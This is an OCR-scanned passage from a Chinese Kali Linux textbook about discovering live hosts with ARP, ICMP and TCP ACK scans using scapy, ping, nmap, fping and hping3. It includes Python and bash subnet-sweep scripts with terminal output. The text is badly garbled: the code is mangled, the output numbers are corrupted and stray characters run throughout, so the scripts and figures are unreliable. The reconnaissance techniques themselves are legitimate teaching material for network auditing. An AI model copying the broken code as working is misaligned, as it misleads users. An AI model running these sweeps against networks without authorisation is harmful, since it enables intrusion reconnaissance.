\xO0\X 9N\x99\x99N\x99\x99N\x99N\x99N\x99” | 


[step 图 数据 包 的 发 送 与 显示 ， 通 过 一 条 指令 
可 以 完成 数据 包 的 发 送 与 显示 ， 该 命令 为 
sr1(ARP(pdst="192.168.1.1")).display()， 执 
行 效果 如 下 图 所 示 。 


> Srl(ARP(pdst="192.168.1.1°)).display() 
Begin emission: 
Finished sending 1 packets 
* 
Received 1 packets, got 1 answers, remaining 9 packets 
###[ ARP ]### 

hwtype= 9x1 

ptype= 9x899 

hwlen= 6 

plen= 4 

op= is-at 

hwsrc= 1c:fa:68:01:2f:08 

psrc= 192.168.1.1 

hwdst= 09:9c:29:39:f2:9c 

pdst= 192.168.1,191 
j###[ Padding ]### 

load= '\x0O\xOO\x00\x00\x00\x00\x00\x00\x00\x00\xO 

le\xegvxggNxg9Nxgg\x99N\xggNxg9 


另外 ，scapy 工 具 支 持 使 用 python 脚 本 
语言 调用 ， 下 面 给 出 一 段 调用 脚本 代码 。 
具体 代码 如 下 : 


#!/usr/bin/python  ”#python 脚 本 格式 
import logging 埋 导 入 日 志 库 文件 
import subprocess  # 导 入 系统 命令 调用 库 


logging.getLogger ("scapy.runtime"). 
setLevel (logging .ERROR) 
# 设 置 日 志 等 级 
from scapy.all import * 
# 导 入 scapYy 库 的 所 有 文件 
if len(sys.argv) !=2: # 如 果 输 入 的 参数 不 
等 于 2 做 出 提示 下 面 是 具体 提示 信息 
Print Usage ap diecspy 
[interface]™" 
print"Example . ./arp disc.py eth0" 
print "Example will perform an ARP 
scan of the local subnet to which eth0 
is assigned" 
Sys, exit AD) 
Tntertace = Doteasy argrl il) 
# 将 网 卡 参 数 赋值 给 变量 interface 
# 执 行 ifconfig 命 令 从 中 筛选 出 信息 
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A 一 所 有 DEC LeIC KE 
output ("ifconfig"+" "+interface+" | grep 
"inet"' ",shell=True) .strip() 

ip = ip.split(' ')[1] # 截 取 IP 字 段 


prefix = ip.split('.")[0]+'.'+ip. 
spiit(".")i1li "Fip.spliit(".") 12)." 
# 截 取 IP 前 三 个 字段 


for adqr in range(0,254) : # 定 义 循环 

ip=prefix+str (addr) # 构 建 ITP 地 址 

# 下 面 这 段 代码 用 于 发 送 数据 包 ， 设置 超时 时 间 
0.1lms，verbose=0 不 显示 错误 信息 


answer = Srl(ARP (pdst=ip),timeout= 
0.1,verbose=0) 
if answer == None: # 过 滤 掉 空 信息 
pass # 如 果 没 有 信息 过 滤 掉 
else: 
print ip  # 打 印 出 存活 主机 


除 此 之 外 ， 还 可 以 编写 用 于 读 取 文 本 
的 脚本 ， 该 脚本 可 以 读 取 指定 文件 ， 并 扫 
描 文件 中 给 定 的 人 P 地 址 ， 具 体 代 码 如 下 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
if len(sys.argv) !=2: 
print"Usage 
[interface]" 
print"Example . 
EE 
print "Example will perform an ARP 
scan of the local subnet to which eth0 
is assigned" 
sys.exit() 


harpedise. py 


“arp dlise:py 


filename = str(sys.argv[1])  # 定 义 一 个 
变量 读 取 文 件 名 
file = open (filename, 'r') 间 以 读 的 形式 打 


开 该 文件 
for addr in file: # 每 次 从 文件 中 读 取 一 行 
answer = srl(ARP(pdst=addr. 
strip()),timeout=0. 1,verbose=0)# 以 文件 中 
的 IP 地 址 发 送 
if answer == None: 
pass 
else: 
print adqr.strip() # 将 有 返回 的 ITP 进 
行 显示 


10.3 三 层 扫 描 
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是 可 能 会 被 边界 防火 墙 过 滤 掉 。 三 层 扫 描 
主要 是 通过 IP、ICMP 协 议 来 进行 扫描 ， 理 
论 上 通过 三 层 扫描 可 以 发 现任 何 一 台 在 线 
的 主机 ， 当 然 前 提 是 它 接收 并 返回 相应 的 
IP、ICMP 数 据 包 。 


10.3.1 使 用 Ping 命 令 


Ping 指 的 是 端 对 端 连通 ， 通 常用 来 作 
为 可 用 性 的 检查 ， 但 是 某 些 病毒 木马 会 强 
行 大 量 远程 执行 Ping 命 令 来 抢占 用 户 的 网 
络 资源 ， 导 致 系统 变 慢 ， 网 速 变 慢 。 因 此 
大 多 数 防火 墙 的 一 个 基本 功能 便 是 过 滤 
Ping 数 据 包 。 

IP 协 议 是 将 多 个 包 交 换 网 络 连接 起 
来 ， 它 在 源 地 址 和 目的 地 址 之 间 传 送 一 种 
称 之 为 数据 包 的 东西 ， 它 还 提供 对 数据 大 
小 的 重新 组 装 功能 ， 以 适应 不 同 网 络 对 数 
据 包 大 小 的 要 求 。 


人 移 注 意 : IP 不 提供 可 靠 的 传输 服务 ， 它 不 
提供 端 到 端的 或 〈 路 由 ) 节点 到 〈 路 由 ) 
节点 的 确认 ， 对 数据 没有 差错 控制 ， 它 只 
使 用 报头 的 校 验 码 ， 它 不 提供 重 发 和 流量 
控制 。 如 果 出 错 可 以 通过 ICMP 报 告 ，ICMP 
在 IP 模 块 中 实现 。 


ICMP 是 (Internet Control Message Pro- 
tocol)〉Internet 控 制 报 文 协议 。 它 是 TCP/IP 
协议 族 中 的 子 协议 ， 用 于 在 主机 、 路 由 器 
之 间 传 递 控 制 消息 。 控 制 消息 是 指 网 络 通 
不 通 、 主 机 是 否 可 达 、 路 由 是 否 可 用 等 网 
络 本 身 的 消息 。 这 些 控制 消息 虽然 并 不 传 
输 用 户 数据 ， 但 是 对 于 用 户 数据 的 传递 起 
着 重要 的 作用 。 

下 面 介绍 Ping 命 令 的 使 用 ， 具 体操 作 步 
又 如 下 : 

[step 图 在 Kali Linux 系 统 界 面 中 ， 执 行 Ping 
-h 命 令 可 以 查看 Ping 命 令 的 帮助 信息 ， 执 行 
效果 如 下 图 所 示 。 
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Footerali: -# ping 
sng: Ping te boaorhn noqrRUvV64] 1 LI interface 
HY Lm pmtud st pption] U1 prelond] Ub batten) [0 tos] 

[3 pockersize TS 36dbuf Dt ttt -7 tinestanp option] 
L-w deadline] [-W tineout] fhopl ...] desrinarion 

lusage: ping -5 -anbBdpfhtnoqrRuyv] [-c count] [-i interval] [-I interface] 
EL preload] [-n mark] [-M pmtudisc_option] 
EN nodeinfo option] [-p pattern] [-0 tclass] [-5 packetsize] 
Ls sndbufl T T Tinestamp_optionl [-w deadline] 
[-W timeout] destination 


[ep 图 如 果 需 要 执行 发 送 的 数据 包 数 量 ， 
这 时 可 以 执行 Ping 192.168.1.1 -c 3 命令 。 其 
中 ，-c 参 数 的 作用 是 指定 发 送 几 个 数据 包 ， 
执行 效果 如 下 图 所 示 。 

root@kali:~# ping 192.168.1.1 -c 3 

PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data. 

64 bytes from 192.168.1.1: icmp seq=1 ttL=64 time=6.946 ms 


(64 bytes from 192.168.1.1: icmp seq=2 ttl=64 time=1.01 ms 
64 bytes from 192.168.1.1: icmp_seq=3 ttl=64 time=1.22 ms 


-- 192.168.1.1 ping statistics --- 
3 packets transmitted, 3 received, 9% packet loss, time 6ms 
rtt min/avg/max/mdev = 9.949/1.955/1.216/6.126 ms 


通过 Wireshark 工 具 可 以 抓 取 数 据 包 ， 
其 中 包含 源 地 址 与 目的 地 址 ， 以 及 ICMP 协 
议 中 的 Type 字段 ， 该 字段 为 8 个 ， 执 行 效果 
如 下 图 所 示 。 


ImEErmsc PrarOEOT VerSION 4, STET T9Z-T68-T-T9T USET 192-T68-TT 
~ Internet Control Message Protocol 
Type: 8 (Echo (ping) request) 
日 


Checksum: gxaade [correct] 
[checksum Status: Good] 
Identifier (BE): 4491 (9x1131) 
Identifier (LE): 12561 (Bx3111) 
Sequence number (BE): 1 (Bx96691) 
Sequence number (LE): 256 (Bxb1699) 
TResponse frame: 6] 
Timestamp from icmp data: Oct 24, 2018 23:47:35.000006060 EDT 
[Timestamp from icmp data (relative): 0.885739416 seconds] 
» Data (48 bytes) 


查看 返回 数据 包 中 的 ICMP 协 议 ， 该 
数据 包 中 的 ICMP 协 议 Type 字 段位 为 0， 执 
行 效 果 如 下 图 所 示 。 


TImrErWer PrOrOCOT VerSION 4 STET T92-T68-TTT DSET T92-T68-TTHT 
~ Internet Control Message Prorocol 

Type: 9 (Echo (ping) reply) 

code: 9 

Checksum: exacde [correct] 

[checksum Status; Good] 

Identifier (BE): 4401 (Ox1131) 

Identifier (LE): 12561 (9x3111) 

Sequence number (BE): 1 (9x9001) 

Sequence number (LE): 256 (9x91696) 

[Request frame: 5] 

[Response time: 1.376 ms] 

Timestamp from icnp data: Oct 24, 2918 23:47:35.999999966 EDT 

[Timestamp fron icnmp data (relative): 9.887115143 seconds] 

，Data (46 bytes) 


[Step 图 查看 到 达 目 标 地 址 经 过 多 少 跳 路 由 
器 ， 使 用 traceroute 命 令 可 以 查看 到 达 目 标 
地 址 经 过 多 少 跳 路 由 器 ， 执 行 效果 如 下 图 
所 示 。 图 中 给 出 了 部 分 路 由 节点 ， 可 以 看 
到 当前 路 由 器 设置 了 ICMP 数 据 包 过 滤 。 


RE 
trai ba (220 391 111.188) ,30 hops 


ax, 60 byte packets 


ge 
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traceroute (Windows 系 统 下 是 tracert) 命令 利用 ICMP 协 议定 位 用 户 的 计算 机 和 目标 
计算 机 之 间 的 所 有 路 由 器 ， 它 是 侦 测 主机 到 目的 主机 之 间 所 经 路 由 情况 的 重要 工具 ， 也 
是 最 便利 的 工具 。 使 用 traceroute 命 令 侦 测 主机 的 详细 过 程 如 下 : 

(1) 将 传递 到 目的 人 地 址 的 ICMP Echo 消息 的 TTL 值 被 设置 为 1， 该 数据 报 经 过 第 
一 个 路 由 器 时 ， 其 TTL 值 减 去 1， 此 时 新 产生 的 TTL 值 为 0。 

(2) 由 于 TTL 值 被 设置 为 0， 路 由 器 判断 此 时 不 应 该 尝试 继续 转发 数据 报 ， 而 是 直 
接 抛 弃 该 数据 报 。 由 于 数据 报 的 生存 周期 (TTL 值 ) 已 经 到 期 ， 这 个 路 由 器 会 发 送 一 个 
ICMP 时 间 超时 ， 即 TTL 值 过 期 信息 返回 到 客户 端 计算 机 。 

(3) 此 时 ， 发 出 traceroute 命 令 的 客户 端 计算 机 将 显示 该 路 由 器 的 名 称 ， 之 后 可 以 
再 发 送 一 个 ICMP Echo 消 息 并 把 TTL 值 设置 为 2。 

(4) 第 1 个 路 由 器 仍然 对 这 个 TTL 值 减 1]。 如 果 可 能 ， 将 这 个 数据 报 转发 到 传输 路 径 
上 的 下 一 跳 。 当 数据 报 抵达 第 2 个 路 由 器 ，TTL 值 会 再 被 减 去 1， 成 为 0。 

(5) 第 2 个 路 由 器 会 像 第 1 个 路 由 器 一 样 ， 抛 弃 这 个 数据 包 ， 并 像 第 1 个 路 由 器 那样 


返回 一 个 ICMP 消 息 。 


(6) 该 过 程 会 一 直 持 续 ，traceroute 命 令 会 不 停 地 递增 TTL 值 ， 而 传输 路 径 上 的 路 
由 器 不 断 递减 该 值 ， 直 到 数据 报 最 终 抵 达 预 期 的 目的 地 。 
(7) 当 目 的 计算 机 接收 到 ICMP Echo 消息 时 ， 会 回 传 一 个 ICMP Echo Reply 消 息 。 


过 滤 网 络 中 存活 主机 的 JP 地址 ， 使 用 
Ping 192.168.1.1 -c 5 | grep "bytes from" | cut 
-d""-f4|cut-d":" -fl 命令 ， 可 以 将 网 络 中 
存活 主机 的 了 P 地 址 过 滤 出 来 ， 执 行 效果 如 下 
图 所 示 。 
root@kali:-~# ping 192.168.1.1 -c 5 | grep "bytes from 
| cut -d""-f4| cut-d":" -fl 
192.168.1.1 
192.168.1.1 
192.168.1.1 


192.168.1.1 
192.168.1.1 


通过 上 面 过 滤 的 特性 可 以 编写 一 个 自 
动 化 Ping 的 shell 脚 本 。 具 体 代码 如 下 : 
#!/bin/bash 
if [ “$#" -ne 1 ]7then 
echo"Usage-./Pingl.sh [interface]" 
echo"Excample-./Pingl.sh 192.168.1" 
echo"Example will perform an ICMP 
scan of the 192.168.1.0/24 range " 
号 芭 二 发 
f 
prefix=$1 
for addr in $(seq 1 200);do # 循 环 发 送 
Ping 命 令 到 地 址 段 


Ping :=C 1 $prefix.$addr | grep 
"Dytes from” HH cut =d™ "=f 4 eut =ad 
Pr bh dm 

done 


当然 也 可 以 编写 一 个 通过 读 取 文件 来 
进行 扫描 的 shell 脚 本 。 具 体 代码 如 下 : 


#!/bin/bash 
1£ [ "S$#" -ne 1 Jrthen 
echo"Usage-./Ping2.sh [interface]" 
echo"Excample-./Ping2.sh file" 
echo" Example will perform an ICMP 
scan of the file in range " 
exit 
五 
file=$1 
for addr in $(cat $file);do 
中 的 内 容 ， 每 循环 一 次 读 取 一 行 
Ping -c 1 $addr | grep "bytes from" 
Deat ”Ea | ou = = Ll 
done 


10.3.2 ”使 用 工具 扫描 
在 三 层 扫描 中 ， 可 以 使 用 scapy、 


坦 定义 一 个 变量 将 参数 赋值 给 变量 
# 读 取 文 件 
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Namp、fping、hping 等 工具 来 扫描 当前 网 络 
存活 的 主机 。 


1. scapy 工 具 


使 用 scapy 工 具 的 操作 步骤 如 下 : 
[step 图 使 用 scapy 工 具 构 建 Ping 包 ， 定 义 
变量 ij 并 赋值 为 IJP()， 定 义 变量 p 并 赋值 为 
ICMPO， 再 定义 Ping 变 量 ， 将 卫 包 与 ICMP 
包 组 合 赋值 给 Ping， 执 行 效果 如 下 图 所 示 。 


ping=(1/p) 
ping.display() 
HIP 4h# 


ses[ ICNP ]2s# 
pe= echo-request 


由 0.0,1 
|_AeptionsN 


息 ， 给 IP 


SS» 


发 送 Ping 包 检查 返回 数据 
包 赋 值 为 目标 地 址 ， 使 用 srl1() 方 法 发 送 数据 
包 ， 并 查看 返回 数据 包 的 信息 ， 执 行 效果 
如 下 图 所 示 。 


> pinglip] dst = "192 168 1 
2>> a = srl(ping) 

Begin emission: 

,Finished sending 1 packets 


Received 2 packets, got 1 answers, renaining 6 packets 
>> a,display() 
HUI IP ] 4Mp jag#[ TCMP J### 


load= 
X00\x0\xHA\xae\xa0\ X00\ xOO\x@0\ x 


\x0O\x00\xO0\xO0\ xe0\xO0\xO0\ xO0\ xO0 


step 国 使 用 命令 构建 Ping 包 ， 该 命令 为 : 
srl(IP(dst="192.168.1.1")/ICMP()). 
displayO0， 执 行 效果 如 下 图 所 示 。 


=> SrIlIP(dst="192. 160.1.1"I/ICHP()) dispTay(7 
Beyin enission: 
.Finished sending 1 packets. 
Recetved 2 packets, got 1 answers, renaining 9 packets 
[ITP 4 1 ICHP | 4h# 
Verstons 4 
iht= 5 


secq= x 
hh[ Padding ] 2 人 


load= ，\xgevxggNxg 
xgG\xb8Nx09\x60\x66\xgg\xg 


9\x69\xgeNxbgvx9g\x9eN 
6\x69 


通过 上 面 的 命令 ， 可 以 编写 一 个 自动 
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化 python 脚 本 ， 来 构建 Ping 数 据 表 ， 具 体 代 
码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import 六 
if len(sys.argv) !=2: 
print"Usage . 
[interface]" 
print"Example 。 
L92=168=350° 
print "Example will perform an ICMP 
scan of the 192.168.1.0/24 range" 
sys.exit() 
address = strl(sys.argv[1]) 
变量 ,将 参数 赋值 给 变量 
# 拆 分 出 IP 地 址 
prefiz = Aaddress Spillitt(t ,ss., 
De Dd 必 全 于 二 < 省 
| 和 着 Taddress sp Ett a 
for addr in range(1,254) : 
ip=prefix+str (addr) # 组 装 IP 地 址 
## 构 建 Ping 包 并 发 送 ， 设置 超时 时 间 0.1ms， 不 
显示 错误 信息 
answer = srl(IP(dst=prefix+ 
str(addr))/ICMP(),timeout=0.1,verbose=0) 


-APAnmgl py 


/Pingl .py 


# 定 义 一 个 


) 
) 


if answer == None: 
pass 
else: 
print prefix+str (addr) # 将 存活 主 
机 IP 地 址 打印 出 来 


当然 也 可 以 将 IP 地 址 存放 在 一 个 文件 
中 ， 通 过 python 肢 本 读 取 文件 中 的 人 P 地 址 进 
行 扫描 ， 具 体 代码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
if lenl(sys.argv) !=2: 
print "Usage < 
[interface]" 
print"Example . 
L192 168-1 .0 
print "Example will perform an ICMP 
scan of the 192.168.1.0/24 range" 
sys.exit() 
filename = str(sys.argv[1])# 定 义 一 个 变 
量 ,将 参数 中 的 文件 名 赋值 给 变量 


FPLnNGLBY 


ANPEnGL eBY 


file = open (flename ,'r') 寺 定 义 一 个 
变量 ,使 用 open 方 法 以 读 的 方式 打开 文件 
for addr in fle: 
每 次 读 取 一 行 IP 地 址 
answer = srl(IP(dst=addr.strip())/ 
ICMP () ,timeout=0.1,verbose=0) 
if answer == None: 
pass 
else: 
print addr.strip() 


机 IP 地 址 打印 出 来 


坦 从 文件 中 


# 将 存活 主 


2. Nmap 工 具 


在 二 层 扫 描 时 ， 可 以 使 用 Nmap 工 具 进 
行 扫 描 ， 在 三 层 扫 描 中 也 可 以 使 用 Nmap 工 
具 ， 但 是 地 址 却 不 同 ， 二 层 只 能 在 本 机 网 
段 进行 扫描 ， 三 层 可 以 使 用 任何 网 段 。 

使 用 Nmap 工 具 进行 三 层 扫描 的 具体 
方法 为 : 使 用 Nmap 220.181.111.0/24 -sn 命 
令 ， 换 用 不 同 地 址 段 的 人 P 进 行 扫 描 ， 它 会 发 
送 ICMP 数 据 包 ， 执 行 效果 如 下 图 所 示 。 


rootakali: /Test/3# nnap 220.181.111.0/74 -sn 

lstarting Nmap 7.70 ( https://nmap.org ) at 2918-16-25 04:31 EDT 
INnap scan report for 229.181.111.16 

Host is up (6.963s tatency)。 

INnap scan report for 229.181.111.21 

Host is up (0.0495 latency). 

Nmap scan report for 229.181.111.22 

Host is up (6.972s latency). 


3. fping 工 具 


fping 工 具 同 Ping 工 具 类 似 ， 但 是 它 不 
是 系统 自 带 的 ， 它 比 Ping 工 具 返 回 的 信息 量 
更 大 。 其 中 常用 参数 介绍 如 下 : 
e -g: IP 区 间 表 示 需 要 增加 -g 参 数 ， 
可 以 用 fping -g 192.168.1.0/24 这 
样 的 形式 展示 也 可 以 用 fping -g 
192.168.1.1 192.168.1.254 这 样 区 间 
展现 的 形式 。 
e -q: 安静 模式 ， 所 谓 安静 就 是 中 途 
不 输出 错误 信息 ， 直 接 在 结果 中 显 
示 ， 输 出 结构 整齐 、 高 效 。 
e -C: 输入 每 个 IP 探 测 的 次 数 。 
e -i: 通过 -i 参数 可 以 修改 发 包间 隔 ， 
默认 为 25ms 一 个 探测 报 文 。 
使 用 fping 工 具 进 行 三 层 扫描 的 操作 步 
又 如 下 : 
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[se 图 发 送 数据 包 ， 使 用 fping 192.168.1.1 -c 
3 命令 发 送 3 个 数据 包 ， 进 行 信 息 探 测 ， 执 
行 效果 如 下 图 所 示 。 


FeataRaUIS-TTesE758 fping 193.168.1.1 -C3 
92.168.1.1 : [8], 84 bytes, 1.81 ms (1.91 avg, 9% loss) 
hez2.168.1.1 : [1], 84 bytes, 1.24 ms (1.12 avg, 6% loss) 


192.168.1.1 : [2], 84 bytes，1.26 ms (1.15 avg, 0% loss) 


192.168.1.1 : xmt/rcv/%loss = 3/3/6%, min/avg/max = 1.91/1.15/1.24 


Estee 图 扫描 一 个 网 段 ， 使 用 fping -g 
192.168.1.1 192.168.1.200 -c 1 命令 ， 可 以 扫 
描 两 个 了 P 地 址 之 间 的 一 个 网 段 ， 执 行 效果 如 
下 图 所 示 。 


[FooTekall Tet Tping -9 192. 168,1.1 192.168.1.200 -CT 
gO% loss) 


wp Host unreachable from 192.168.1,191 for ICMP Echo sent to 192,168.1.3 
cMP Host Unreachable from 192.158.1.161 for ICMP Echo sent to 192,168,1.2 
TcMP Host Unreachable from 192.168.1.181 for ICMP Echo sent to 192.168.1.6 
5 
4 


cMP Host Unreachable from 192.158,1.161 for ICMP Echo sent to 192,168.1, 


192.168,1.1 :xmt/rev/sloss = 1/1/0%, min/ovg/mox = 1.16/1.15/1.16 
he2.168.1.2 BE 

hs2-168.1.3 

192.168.1.4 。 : xmt/rcv/%loss = 1/9/196% 


[step 图 使 用 fping -g 192.168.1.1 
192.168.1.200 -c 1 >> a.txt 命 令 ， 将 存活 的 主 
机 字段 保存 到 一 个 文件 中 ， 并 通过 cat a.txt 
文本 显示 出 存活 主机 信息 ， 执 行 效果 如 下 
图 所 示 。 

root@kali:~/Test/3# cat a.txt 
192.168.1.1 : [9], 84 bytes, 


192.168.1.161 : [9], 84 bytes, 
192.168.1.192 : [6], 84 bytes, 


fping 工 具 支 持 使 用 掩 码 的 形式 赋 
值 地 址 段 ， 使 用 fping -g 192.168.1.0/24 
-c 1 命令 ， 扫 描 地 址 段 ， 执 行 效果 如 下 图 
所 示 。 


FoRATI 7 TesT 
ha2.168.1.1 : [9], 84 bytes, 1.98 ms (1.68 avg, 0% 10ss) 

L2168.1.392 + [9], 84 bytes, 9.92 ws (9-62 avo, loss) 

192.168.1.162 bytes, 141 ms (141 avg，6% loss) 

Phebe ost un?etchabie fon $3 .360.27103 #7 em eth’ Dant to 192.168.1.3 
CMPp Host Unreachable from 192.168.1.191 for IcMp Echo sent to 192.168.1.2 


[step 图 fping 工 具 支 持 从 文件 中 读 取 IP 地 址 
进行 扫描 ， 使 用 fping -f addr 命 令 ， 扫 描 
文件 中 给 出 IP 地 址 段 ， 执 行 效果 如 下 图 
所 示 。 


FoovekalL: Tes FE Tping -7 addr 
Uive 


1.23 ms (1.23 avg，6% loss) 
9.98 ms (0.98 avg, 0% loss) 
136 ms (139 avg, 9% loss) 


Tg TpIng -9 T92-T68-T-H774 eT 


ICMP Host Unreachable fron 192.168.1.191 for ICMP Echo sent to 192.168.1.2 
192.168.1.2 is unreachabte 
192.168.1.160 is unreachable 


4. hping 工 具 


hping 是 一 个 命令 行 下 使 用 的 TCP/IP 数 
据 包 组 装 /分 析 工 具 ， 其 命令 模式 很 像 Linux 
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下 的 Ping 命 令 ， 但 是 它 不 是 只 能 发 送 ICMP 
回应 请 求 ， 它 还 支持 TCP、UDP、ICMP 和 
RAW-IP 协 议 。 

另外 ，hping 有 一 个 路 由 跟踪 模式 ， 能 

够 在 两 个 相互 包含 的 通道 之 间 传 送 文件 。 
因此 ， 常 被 用 于 检测 网 络 和 主机 ， 其 功能 
非常 强大 ， 可 在 多 种 操作 系统 下 运行 ， 如 
Linux、FreeBSD、NetBSD、OpenBSD、 
Solaris、MacOs X、Windows 等 。 

该 工具 的 主要 参数 介绍 如 下 : 

e -H (-HELP) : 显示 帮助 。 

e -Vv (-VERSION) : 版 本 信息 。 

@ -c (--count count) ; 发 送 数 据 包 的 
次 数 。 关 于 countreached timeout 可 
以 在 hping2.h 里 编辑 。 

e -i(-interval) : 包 发 送 间隔 时 间 
(单位 是 ms) ， 默 认 时 间 是 1s。 此 
功能 在 增加 传输 率 上 很 重要 ， 在 idle/ 
spoofing 扫 描 时 此 功能 也 会 被 用 到 。 

e -n (-nmeric) : 数字 输出 。 象 征 性 
输出 主机 地 址 〈 用 处 不 大 ) 。 

e -qdq (-quiet) : 退出 。 什 么 都 不 会 输 
出 ， 除 了 开始 结束 时 间 。 

® -i (--interface interface name) : 无 
非 就 是 eth0 之 类 的 参数 。 

e -Vv (-verbose) : 显示 很 多 信息 ， 
TCP 回 应 一 般 如 下 : len=46; 
ip=192.168.1.1; flags=RADF:; seq=0; 
ttl=255; 1d=0; win=0; rtt=0.4ms; tos=0; 
iplen=40; seq=0; ack=1380893504; 
sum=2010; urp=0。 

e -d (-debug) : 进入 debug 模 式 ， 当 
遇 到 麻烦 时 ， 比 如 用 hping 遇 到 一 些 
不 合 习惯 的 模式 时 ， 你 可 以 用 以 下 
模式 修改 hping, (interface detection 
data link layer access, interface 


settings, ...)。 
。 -z (-BIND) : 快捷 键 的 使 用 (可 
按 个 人 喜好 设 定 ) 。 
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e -Z (-unbind) : 消除 快捷 键 。 

该 工具 的 主要 功能 如 下 : 

(1) 防火 墙 测试 。 

(2) 实用 的 端口 扫描 。 

(3) 网 络 检测 ， 可 以 用 不 同 的 协议 、 
服务 类 型 (TOS) 、 也 分 片 。 

(4) 手工 探测 MTU (最 大 传输 单元 ) 
路 径 。 

(5) 先进 的 路 由 跟踪 ,支持 所 有 的 
协议 。 

(6) 远程 操作 系统 探测 。 

(7) 远程 的 运行 时 间 探 测 。 

(8) TCP/IP 堆栈 审计 。 

使 用 hping 工 具 进行 三 层 扫 描 的 方法 
为 : 使 用 hping3 192.168.1.1 --icmp -c 2 命 
令 ， 可 以 对 目标 IP 进 行 探测 ， 并 给 出 相应 的 
信息 ， 执 行 效果 如 下 图 所 示 。 


ES pin 


headers + 9 data bytes 
ns 


192.168.1.1 
2 pack 


round 


另外 ， 用 户 可 以 使 用 for addr in $(seq 
1 254):do hping3 192.168.1.$addr --icmp -c 1 
>> handle.txt &done 命 令 ， 对 一 个 IP 段 的 地 
址 进行 扫描 并 将 结果 保存 到 一 个 文件 中 。 
这 是 因为 该 工具 显示 出 来 的 东西 比较 多 比 
较 杂 ， 所 以 建议 保存 到 一 个 文件 当中 再 进 
行 查看 。 


( 侈 提示 : 使 用 cat handle.txt | grep len | cut -d 
wf2 | cut -d "=" -f 2 命令 ， 可 以 将 文本 中 
存活 主机 的 了 P 信 息 提取 出 来 。 


10.4 四 层 扫描 


四 层 扫描 的 优点 是 结果 可 靠 ， 而 且 
不 会 被 防火 墙 过 滤 ， 甚 至 可 以 发 现 所 有 端 
口 都 被 过 滤 的 主机 ， 缺 点 是 基于 状态 过 滤 
的 防火 墙 可 能 过 滤 扫 描 ， 且 全 端口 扫描 速 


度 慢 。 四 层 扫 描 是 基于 TCP、UDP 协 议 来 进 
行 的 。 


10.4.1 TCP 扫 描 


TCP (Transmission Control Protocol, 
传输 控制 协议 ) 是 一 种 面向 连接 的 、 可 靠 
的 、 基 于 字 节 流 的 传输 层 通信 协议 ， 由 
IETF 的 RFC 793 定 义 ， 在 简化 的 无 线 网 络 
OSI 模 型 中 ， 它 完成 第 四 层 传 输 层 所 指定 的 
功能 。 

在 因特网 协议 族 (Internet protocol 
suite) 中 ，TCP 层 是 位 于 IP 层 之 上 ， 应 用 层 
之 下 的 中 间 层 。 不 同 主机 的 应 用 层 之 间 经 
常 需要 可 靠 的 、 像 管道 一 样 的 连接 ， 但 是 了 
层 不 提供 这 样 的 流 机 制 ， 而 是 提供 不 可 靠 
的 包 交 换 。 

TCP 通 信 需 要 建立 3 次 握手 ，TCP 的 3 次 
握手 示意 图 如 下 。 
pa Ee 


Sry 
sm 


服务 器 
wn IE 
wu MY 攻 一 
ht sages 
.akeysy 
| 


TCP 探 测 主机 的 原理 有 如 下 两 条 。 

(1) 未 经 请 求 直 接 发 送 ACK 数据 包 ， 
通常 情况 下 主机 会 回复 RST 数据 包 。 

(2) 正常 请 求 发 送 SYN 请 求 数 据 包 ， 
如 果 端 口 开 放 会 回复 SYN/ACK 数据 包 ， 如 
果 端 口 没 有 开放 回复 RST 数据 包 。 

使 用 scapy 工 具 进 行 TCP 扫 描 的 操作 步 
又 如 下 : 
[sep 贺 通过 scapy 构 建 TCP 数 据 包 ， 使 用 
i=IP():; i.dst="192.168.1.1"; idispaly0 命 令 ， 
执行 效果 如 下 图 所 示 ， 可 以 看 到 修改 了 IP 字 
段 的 目的 卫 地 址 。 
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ES 
p>> 1.dst="192.168.1.1" 
上 >> idisptay() 
pal IP ]34# 
versions 4 


[ssp 图 通过 t=TCPO: t.flags='A'; t.display() 
命令 ， 可 以 修 收 TCP 数 据 包 的 发 送 类 型 为 
ACK 数 据 包 ， 执 行 效果 如 下 图 所 示 。 


> t=TCP() 

>>> t.fLags='A' 

>>> t.display() 

###[ TCP ]### 
sport= ftp_ data 
dport= http 
seq= 9 
ack= 9 
dataofs= None 
reserved= 9 
flags= A 
window= 8192 
chksum= None 
urgptr= 9 
options= [] 


使 用 [=(i/0).display0 命 令 ， 可 以 将 下 包 
与 TCP 包 组 合 ， 并 查看 数据 包 结 构 ， 执 行 效 
果 如 下 图 所 示 。 


ps3 r=07T) .disptayty 
J enw Hh#[ TCP J#4# 


Version= 4 sport= ftp_dat 
ihl= None dport= http 
tos: seo= 0 
len ack= 0 
id= 1 dataofs= None 
Tlags= reserved= 日 
frag= © flags= A 
wind 
chksun= None 
urgptr= 9 
options= 1 


Moprlons\ 


使 用 命令 a=srl(D.dispaly0 命 令 ， 将 数 
据 包 发 送出 去 ， 查 看 返回 数据 包 内 容 ， 执 
行 效果 如 下 图 所 示 。 


> i=IP() 
=> tzTCP() 
>>> a=sr1(r) 


lBegin emission: 
.Finished sending 1 packets. 


Received 2 packets, got 1 answers, renaining 9 packers 
esl IP Jean #44[ TCP J24# 


\x00\xg0, 
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使 用 “; ”符号 结束 语句 。 该 语 
一 条 单独 语 自 ， 为 了 便于 区 分 特别 加 入 
(在 代码 中 是 没有 分 号 的 ) 。 


step 较 使 用 一 条 命令 可 以 完成 TCP 扫 描 ， 


该 命令 为 a1=srl(IP(dst="192.168.1.1")/ 
TCP(dport=80,flags="'A'),timeout=0.1). 
display()， 执 行 效果 如 下 图 所 示 。 


hhh A Lh ER 2 | 


ts 


Weceived 1 packets, got 1 ansvers，remaining 9 packets 
[ IP J aol T 


= ftp_data 


x@0\x00\x00\ 00 


下 面 编辑 一 i hen 网站 来 实现 四 层 
TCP 自 动 扫描 ， 具 体 代码 如 下 : 


#!/usr/bin/python 
import logging 
import subprocess 
logging.getLogger("scapy.runtime"). 
setLevel (logging .ERROR) 
from scapy.all import * 
if lenl(sys.argv) !=2: 
print"Usage . ./TCP_SCAN.py [/24 
network address]" 
print"Example 
926 
print "Example will perform a TCP 
ACK Ping scan of the 192.168.1.0/24 
range" 
sys.exit() 
address = str(sys.argv[1]) 
